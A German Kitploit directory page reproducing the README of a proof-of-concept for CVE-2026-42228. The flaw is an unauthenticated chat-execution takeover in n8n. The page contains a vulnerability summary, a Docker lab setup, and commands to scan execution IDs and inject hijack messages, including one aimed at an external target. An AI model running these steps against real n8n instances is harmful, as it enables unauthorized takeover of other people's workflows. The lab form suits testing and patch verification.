Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-42228 — Proof-of-Concept-Exploit für CVE-2026-42228, eine nicht authentifizierte Schwachstelle zur Übernahme der Chat-Ausführung in n8n, mit automatisierten Scan- und Angriffsskripten. | Kitploit
Tools/GitHubGitHub/rudsarkar/cve-2026-42228
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubrudsarkar/cve-2026-42228

CVE-2026-42228

Proof-of-Concept-Exploit für CVE-2026-42228, eine nicht authentifizierte Schwachstelle zur Übernahme der Chat-Ausführung in n8n, mit automatisierten Scan- und Angriffsskripten.

Repository anzeigen
6vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

GHSA-f77h-j2v7-g6mw — n8n Unauthentifizierte Chat-Ausführungs-Übernahme

CVE: CVE-2026-42228
Schweregrad: Hoch
Betroffen: n8n < 1.123.32
Behoben in: n8n 1.123.32 / 2.17.4 / 2.18.1


Zusammenfassung der Schwachstelle

chat-service.ts :: startSession() akzeptiert eine executionId aus der WebSocket- Query-String und prüft nur, ob die Ausführung in der Datenbank existiert. Es wird niemals verifiziert, ob der Aufrufer autorisiert ist, auf diese Ausführung zuzugreifen.

Ein nicht authentifizierter Angreifer, der eine gültige numerische Ausführungs-ID für eine Ausführung im Wartezustand kennt (oder aufzählen kann), kann:

  1. Sich ohne Anmeldedaten mit dem /chat-WebSocket verbinden.
  2. Die ausstehende Eingabeaufforderung empfangen, die einem legitimen Benutzer angezeigt wird.
  3. Beliebige Chat-Eingaben injizieren, die den Workflow fortsetzt — und übernimmt.

Voraussetzungen:

  • Ein öffentlicher Hosted-Chat-Workflow mit Authentifizierung = Keine ist aktiv.
  • Mindestens eine Ausführung befindet sich derzeit im waiting-Zustand.
  • Der Angreifer kann die numerische Ausführungs-ID erraten oder aufzählen (sequenzielle Ganzzahlen).

Labor-Einrichtung

Anforderungen

  • Docker ≥ 24 mit Compose v2
  • Port 5678 auf localhost frei

Ein-Befehl-Einrichtung

root@kitploit:~
chmod +x exploit.sh
./exploit.sh setup

Dies zieht n8nio/n8n:1.123.22 (letzte betroffene Version), baut das Angreifer- Image und startet das verwundbare Ziel unter http://localhost:5678.


End-to-End-Exploit-Durchführung

1. Das verwundbare Ziel konfigurieren

  1. Öffnen Sie http://localhost:5678 und schließen Sie den Einrichtungsassistenten ab (beliebige Anmeldedaten).
  2. Erstellen Sie einen neuen Workflow.
  3. Fügen Sie einen Chat-Trigger-Knoten hinzu → setzen Sie Authentifizierung = Keine.
  4. Fügen Sie nach dem Trigger einen Warten-Knoten (oder einen beliebigen Knoten, der auf Benutzereingaben pausiert) hinzu.
  5. Aktivieren Sie den Workflow.

2. Eine wartende Ausführung auslösen

Öffnen Sie die öffentliche Chat-URL, die im Chat-Trigger-Knoten angezeigt wird, und senden Sie eine Nachricht. Die Ausführung wechselt in den Wartezustand und pausiert auf die nächste Chat-Antwort.

3. Nach wartenden Ausführungen scannen (nicht authentifiziert)

root@kitploit:~
./exploit.sh scan
# oder einen Bereich angeben:
./exploit.sh scan 1 500

Erwartete Ausgabe, wenn eine verwundbare Ausführung gefunden wird:

root@kitploit:~
[+] WAITING execution found! exec_id=7
    Server said: 'n8n|continue'
    Server said: '{"action":"sendMessage","sessionId":"...","chatInput":"Hello"}'
    [!!!] Hijack payload sent: '[CVE-2026-42228] hijacked by PoC'

4. Eine bekannte Ausführungs-ID direkt angreifen

root@kitploit:~
./exploit.sh attack 7
# oder mit einem benutzerdefinierten Payload:
./exploit.sh attack 7 "custom injected message"

5. Die Übernahme beobachten

Zurück im n8n-Editor wird der Workflow mit der injizierten Nachricht des Angreifers fortgesetzt, anstatt mit der Eingabe des legitimen Benutzers.


Manuelle Docker-Befehle

root@kitploit:~
# Das Angreifer-Image bauen
docker build -t n8n-chat-hijack-poc .

# Scannen (verbindet sich mit dem gemeinsamen Labor-Netzwerk)
docker run --rm --network ghsa-f77h-j2v7-g6mw_lab \
    n8n-chat-hijack-poc \
    --target http://n8n-vuln:5678 \
    --start-id 1 --end-id 200

# Eine bestimmte Ausführung angreifen
docker run --rm --network ghsa-f77h-j2v7-g6mw_lab \
    n8n-chat-hijack-poc \
    --target http://n8n-vuln:5678 \
    --exec-id 7 --inject "PWNED"

# Gegen ein externes Ziel (kein Netzwerk-Flag erforderlich)
docker run --rm n8n-chat-hijack-poc \
    --target https://n8n.example.com \
    --exec-id 42 --inject "PWNED"

Bereinigung

root@kitploit:~
./exploit.sh clean

Stoppt Container und entfernt Volumes (einschließlich der SQLite-Datenbank).


Dateien

DateiBeschreibung
poc_GHSA-f77h-j2v7-g6mw.pyEigenständiger Python-PoC
Dockerfile

Referenzen

  • GHSA-f77h-j2v7-g6mw
  • n8n Release 1.123.32 Changelog
Tool herunterladen
Angreifer-Container-Image
docker-compose.ymlVollständiges Labor: verwundbares n8n + Angreifer
exploit.shHilfsskript für gängige Operationen